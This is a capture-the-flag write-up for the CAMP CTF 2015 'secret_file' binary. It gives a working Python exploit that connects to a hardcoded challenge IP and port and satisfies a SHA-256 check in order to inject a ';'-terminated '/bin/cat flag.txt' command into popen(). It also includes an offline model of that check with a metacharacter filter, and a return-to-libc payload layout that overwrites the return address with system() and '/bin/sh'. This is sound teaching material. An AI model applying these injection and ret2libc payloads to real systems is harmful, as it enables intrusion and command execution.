secret_file (150) CAMP CTF – 2015

This challenge is from CAMP CTF 2015. This is the first time I have solved a real binary exploitation challenge. The given binary is an ELF 64-bit, dynamically linked and stripped. So I randomly gave a large input and got a segmentation fault at some point. So I thought that must be some simple ROP and started reversing it. I found some vulnerable functions like getline (which doesn't check the size of the input), and there was a strcpy call; I was shocked: "why the need for strcpy when you have getline?". To check whether NX is enabled or not, I used checksec.

RELRO         STACK CANARY    NX            PIE            RPATH       RUNPATH
Full RELRO    Canary found    NX enabled    PIE enabled    No RPATH    No RUNPATH

So I was shocked seeing Full RELRO and a canary, with which you cannot use normal ROP. So I thought there must be something other than the overflowing part and started reversing it again. I found one popen call which could spawn a shell. But to reach that call you have to pass a strcmp check. And the comparison was with some hash value.

Later I figured out it was SHA-256, and it was hashing 256 bytes. But I didn't know which 256 bytes those were. After some brute force I found those were the first 256 bytes of the input, and the comparison was made from the 284th byte of the input. I tried giving input matching that and it worked: I could call popen with the argument starting from the 257th byte of the input. Later I tried giving "/bin/sh\x00" as the argument, but that didn't work because there is a strrchr call in the beginning which I didn't notice. That function was actually searching for a null byte. So that didn't work and I wasted a lot of time trying other stuff. Later one of my seniors gave me an idea, which was command injection (;), which I used to read the flag, and that worked… 🙂

And here is my exploit.

import socket

ip = "144.76.92.167"
port = 10105

soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
soc.connect((ip, port))

payload = b""
payload += b"A" * 256                # the 256 bytes that get hashed
payload += b"/bin/cat flag.txt;"    # popen() argument starts at the 257th byte; ';' ends the command
payload += b"B" * 9                  # padding up to the 284th byte
payload += b"e075f2f51cad23d0537186cfcd50f911ea954f9c2e32a437f45327f1b7899bbb"  # this is the SHA-256 of 256 A's

soc.send(payload + b"\n")
print(soc.recv(1050))
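As an added example (not the author's exploit or the challenge binary's code), the following Python 3 model reproduces the gate the writeup describes, so the layout of one input line can be checked offline: the first 256 bytes are hashed, the popen() argument starts at the 257th byte, the hex digest is compared from the 284th byte, and any NUL byte fails the strrchr() check. The offsets, the filler and the `hardened_check` metacharacter filter are this example's own assumptions, and the digest is computed with hashlib rather than hardcoded.

```python
import hashlib

# Offsets as the writeup reports them, converted to 0-based indexes
# (assumption: the 257th and 284th byte are counted from 1).
HASHED_LEN = 256
CMD_OFFSET = 256
DIGEST_OFFSET = 283
SHELL_META = b";|&`$\n"  # characters the shell interprets inside a popen() command


def build_input(command: bytes, filler: bytes = b"A" * HASHED_LEN) -> bytes:
    """Lay out one input line the way the exploit above does (constructed input)."""
    if len(filler) != HASHED_LEN:
        raise ValueError("filler must be exactly the hashed 256 bytes")
    body = filler + command
    if len(body) > DIGEST_OFFSET:
        raise ValueError("command too long: it would overwrite the digest")
    body += b"B" * (DIGEST_OFFSET - len(body))  # pad up to the digest offset
    return body + hashlib.sha256(filler).hexdigest().encode()


def model_check(data: bytes):
    """Model of the binary's gate: returns (passes, string handed to popen)."""
    if b"\x00" in data:  # the strrchr() check: a NUL byte anywhere fails the input
        return False, None
    expected = hashlib.sha256(data[:HASHED_LEN]).hexdigest().encode()
    if data[DIGEST_OFFSET:DIGEST_OFFSET + 64] != expected:
        return False, None
    # popen() reads a C string from byte 256 to the end of the line, so the
    # padding and the digest are part of what the shell sees; ';' cuts them off.
    return True, data[CMD_OFFSET:]


def hardened_check(data: bytes):
    """Same gate, but the argument is rejected if it carries shell metacharacters."""
    ok, arg = model_check(data)
    if ok and any(bytes([c]) in arg for c in SHELL_META):
        return False, None
    return ok, arg


if __name__ == "__main__":
    line = build_input(b"/bin/cat flag.txt;")
    print(model_check(line))      # passes, and the shell line starts with the injected command
    print(hardened_check(line))   # the ';' is caught
```

The real fix is not to hand user-controlled bytes to popen() at all; the filter only makes the injection visible.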

Return-to-libc Attack

Return-to-libc is also a standard buffer overflow attack. But in the case of non-executable memory you cannot execute malicious shellcode placed in memory. So to overcome that barrier we reuse the system() function already present in libc, with a generic return address and a command argument, "/bin/sh"; no shellcode is required with this method.

The technique is very simple: you just have to overflow the buffer and reach EIP (the saved return address). Then you replace the return address with the address of system() and supply the address of "/bin/sh" as its argument. The exploit looks as simple as this.

"AAAAAAAAAAAAA(Buffer)AAAAAAAAAAAAAAAAA" + "&system (overwrites EIP)" + "Fake_address (return address for system)" + "&/bin/sh"